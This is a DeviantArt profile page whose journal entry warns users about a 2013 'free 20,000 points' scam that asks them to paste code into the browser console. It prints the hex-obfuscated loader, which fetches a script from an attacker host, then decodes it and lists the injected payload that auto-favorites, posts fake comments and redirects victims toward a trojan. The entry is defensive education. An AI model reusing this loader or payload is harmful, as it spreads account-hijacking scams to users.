Shop Mobile More Submit  Join Login
About Deviant Alberto CruzMale/Mexico Group :iconfim-pics: FiM-Pics
From Equestria to your PC
Recent Activity
Deviant for 4 Years
Needs Core Membership
Statistics 36 Deviations 666 Comments 6,195 Pageviews
×

Activity


deviantID

ibelcomputing's Profile Picture
ibelcomputing
Alberto Cruz
Mexico
Say NO to dArama by prosaix


free counters

20K points scam (attack)

Journal Entry: Wed Apr 24, 2013, 7:07 PM
Hello everyone,

Recently there are been several picture spam accounts that indicate the user to copy and paste some code into Firefox or Chrome's web console, claiming users will win 20,000 dA points. Nothing could be further from the truth. Remember kids, there is not such thing as free lunch. So, DON'T PASTE ANYTHING YOU DON'T KNOW INTO THE CONSOLE.

I would like to give you all an explanation of why and how these scams work. I know not everyone is familiar with computer stuff so i will skip some details:

Scripts received from the internet are not actually executed, but interpreted by your web browser. This means, seeing their code is one thing, but executing it is another. Being said that, this journal entry is completely harmless because it is just showing content, but doesn't execute anything, just as the malicious deviation page itself can't, so don't worry. You execute it manually by pasting it into the console, and that's why i said "DON'T PASTE ANYTHING YOU DON'T KNOW INTO THE CONSOLE" up there, and the reason the attacker instructs users to do so. This is the way these commands can actually "come to life" and do harm. If you are interested in more technical details you can google "cross-site scripting".

The attacker uses a social-engineering technique, something that may sound attractive to the target audience, to make potential victims do whatever the attacker wants them to do. In this case, he is offering 20,000 dA points.

The code, located at the description, is obfuscated, masquerading its real, malicious intent. It may look something like this:



var _0xaed7=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"];document[_0xaed7[4]][_0xaed7[3]](document[_0xaed7[2]](_0xaed7[1]))[_0xaed7[0]]=_0xaed7[5];





Remember that all code shown is harmless in this state. But if you paste it onto the console it's where it breaks havok. Let's see what this does:
This is in fact HEX code. The values correspond to an ASCII character. The code in ASCII, readable text, looks like this: (Spaces added to avoid making links)



var 0xaed7=["src","script","createElement","appendChild","body","h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r / m i x . j s"];
document[_0xaed7[4]][_0xaed7[3]](document[_0xaed7[2]](_0xaed7[1]))[_0xaed7[0]]=_0xaed7[5];





It does the following:
1. The first part creates an array that contains some strings, which are in fact a link and some instructions...
2. Which put into the proper order, on the second line (considering that arrays begin at the "0th" element): 4th, 3rd, 2nd, 1st, 0th, and 5th, form this string:
document body appendChild ( createElement ( script ) src =  h t t p : / / d e v i a n t a r t . h p .a f .c m / g e n e r a t o r / m i x . j s


When copied and pasted into the console this script is arranged and executed, injecting the contents of the JavaScript located at the attacker's website (which by the way is located at Camerun, by the .cm at the end of the DNS) on the deviation page. But that's not all. The JavaScript injected is this:



document.getElementById("gmi-ResourceViewFaveButton").click();
document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";

setTimeout("document.getElementsByClassName('ll f')[0].click()", 100);
document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit")[0].click();


window.top.location.href='h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r ';
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')





When executed, it does the following:
:bulletred: document.getElementById("gmi-ResourceViewFaveButton").click(); makes the browser click on the favorite button automatically, as to appear on other deviant's favorites and propagate more,
:bulletred: document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!"; is similar to the previous line. This makes the browser post a comment on your behalf saying "It actually works! Wohoooooooo! Thanks!".
:bulletred: setTimeout("document.getElementsByClassName('ll f')[0].click()", 100); makes the browser push the "Comment" button after a timeout, as the post button is disabled by default unless you write a comment.
:bulletred: window.top.location.href='h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r '; opens the attacker's web page at a new window.  
:bulletred: alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed') shows a small text window indicating the victim they are being redirected to the attacker's "generator".

Finally, This page is nothing more than a attempt to lure you to install a trojan virus, claiming it's a plugin necesary to show the generator and giving the attacker complete control on their victim's computer.

Everybody knows about the phony dA login screens floating around. But beware of what you do for freebies, it might be just as bad for your account. Fortunately, dA has been fast taking down these accounts. Unfortunately they keep on appearing. So, what better to avoid attacks than by knowing they exist?

AdCast - Ads from the Community

×

Comments


Add a Comment:
 
:iconbaron-engel:
Baron-Engel Featured By Owner Feb 10, 2013  Professional Traditional Artist
Thanks for the Llama I'll give it a good home in the herd.
Reply
:iconnopeyouwontseemyname:
Nopeyouwontseemyname Featured By Owner Jan 1, 2013  Hobbyist General Artist
ah my old friend
good job with fimpics. im glad to see how well it turned out. im sorry for not helping anymore, i just joined tumblr and sort of forgot. you did well, alberto, you did well.
Reply
:iconelenaboosy:
ElenaBoosy Featured By Owner Nov 25, 2012
Thanks for the llama! :heart:
Reply
:iconfallenzephyrart:
FallenZephyrArt Featured By Owner Nov 19, 2012
Thank you for the watch :love:
Reply
Add a Comment: